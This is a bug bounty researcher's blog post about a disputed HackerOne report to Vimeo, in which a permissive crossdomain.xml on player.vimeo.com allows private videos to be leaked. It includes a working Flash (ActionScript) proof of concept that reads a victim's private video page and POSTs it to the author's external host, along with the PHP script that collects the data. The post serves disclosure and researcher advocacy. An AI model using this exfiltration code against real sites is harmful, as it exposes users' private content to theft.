Hi , guys I hope you are doing well .
Today I will talk about one of my worst experiences in bug bounty programs with Vimeo security team .
First for who don't know Vimeo :
Vimeo (/ˈvɪmioʊ/[3]) is a video-sharing website in which users can upload, share and view videos.[4] It was the first video sharing site to support high-definition video (started in October 2007).[5] Vimeo was founded in November 2004 by Jake Lodwick and Zach Klein. [wiki]
They have started there BB program on hacker one since 2 years ago .
I am not so active these days in the BB but I saw they paid $600 for Private videos disclosure and CSRF on Vimeo leading toprivate videos go public I told myself let's give a try . So the target wasn't about finding XSS or harmless CSRF it was about find a way to leak the private videos since they don't pay well for XSS or other bugs you will get duplicated or mini bounty that you waste a lot of time on .
So I started by reading old reports that related to this purpose . Almost every report was about crossdomain.xml file misconfiguration I focused on this file around the Vimeo sites .
In their rules there are a point about the corssdomain.xml that should be exploitable not just a novel :
- Reports of insecure crossdomain.xml configuration (again, unless you have a working proof of concept -- and not just a report from a scanner)
So I stared looking for this file around the sites and try to find a way to exploit it . I found one here
It is allowing any domain to send requests to this host so the first step in the exploit is okay . But ! we can't say it is a security issue since the player should works in other hosts
So let's see what is can be leaked like CSRF-token , username , email ...etc
After some test I found out that player.vimeo.com check the user cookie to know if he is logged in or not . After that it shows him the private video if he have a permission to show it .
Now I am using 2 browsers Chrome for unauthenticated user and Firefox for user (user36551307)
I uploaded video and set the privacy to only me . here it is https://player.vimeo.com/video/182118182
If we open it using FF we will get this :
If we open it using Chrome
So the source code of the page depends on the user authentication and we can leak in both ways !!!
Now we need to write a flash file to send request to this URL and leak the source code of the page and see if we get the source can we play the video . and I copy the source code of the html page and save it on my PC something like test.html and it works fine !
I called leak.swf
We need to modify the flash file in readFrom:String and sendTo:String
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 | package { import flash.display.Sprite; import flash.events.*; import flash.net.URLRequestMethod; import flash.net.URLRequest; import flash.net.URLLoader; public class XDomainXploit extends Sprite { public function XDomainXploit() { //URL of the private video for the authenticated user var readFrom:String = "https://player.vimeo.com/video/182118182"; var readRequest:URLRequest = new URLRequest(readFrom); var getLoader:URLLoader = new URLLoader(); getLoader.addEventListener(Event.COMPLETE, eventHandler); try { getLoader.load(readRequest); } catch (error:Error) { trace("Error loading URL: " + error); } } private function eventHandler(event:Event):void { //URL to the attacker origin var sendTo:String = "http://xxe-me.esy.es/video.php" var sendRequest:URLRequest = new URLRequest(sendTo); sendRequest.method = URLRequestMethod.POST; sendRequest.data = event.target.data; var sendLoader:URLLoader = new URLLoader(); try { sendLoader.load(sendRequest); } catch (error:Error) { trace("Error loading URL: " + error); } } } |
I modified it to the video URL and my host URL . The swf file will send the source code of the the Vimeo player to video.php which will save the source of this page as new html page .
The video.php source code :
1
2
3
4
5
6
7
8
9
10
| <?php $data = file_get_contents("php://input"); $page_content = file_put_contents('private_video.html', $data, FILE_APPEND | LOCK_EX); if($page_content === false) { die('Didn't work ! '); } else { echo "$page_content exploited !"; } ?> |
When the file get the source code of the page from the leak.swf php code will create a html page called private_video.html with the source code that it got before .
So I made an exploit with full PoC here is the PoC video :
So everything works fine . I wrote a good report with PoC , codes ,steps and technical details .
I got bot response said this is not an issue please provide working PoC ! I already did but I send the video one more time .
after 2 days the team closed the report as "
Thanks for your report. We are aware of this. This is how we allow custom flash players to work.
I was puzzled why they closed this . It is %100 a security issue ! I replayed to them and requested to disclose this report publicly .
I waited for days and requested mediation from HackerOne Support . after 30 days the H1 support told me Vimeo team pushed the public discourse 2 days and should be published then . Fine I will wait for to see the reaction of H1 community . After waiting for 2 days nothing happened ! I waited for 10 days maybe and it is not published yet ! I contacted H1 support again . The last message I got this one :
So Vimoe team has never replayed me in the report and they didn't fix it or contact me for months and they want a 60 days after I requested the PD above all of this this report were closed as " Informative " .
And H1 team has nothing to do ! So I wrote this post for show we aren't in the BB heaven .
BTW this is not the first time for Vimeo team , here is another report without bounty or a respectful replay https://hackerone.com/reports/49663
If you have an opinion on this you can comment it here or on my twitter account @Abdulahhusam
That is all .
Thanks for read .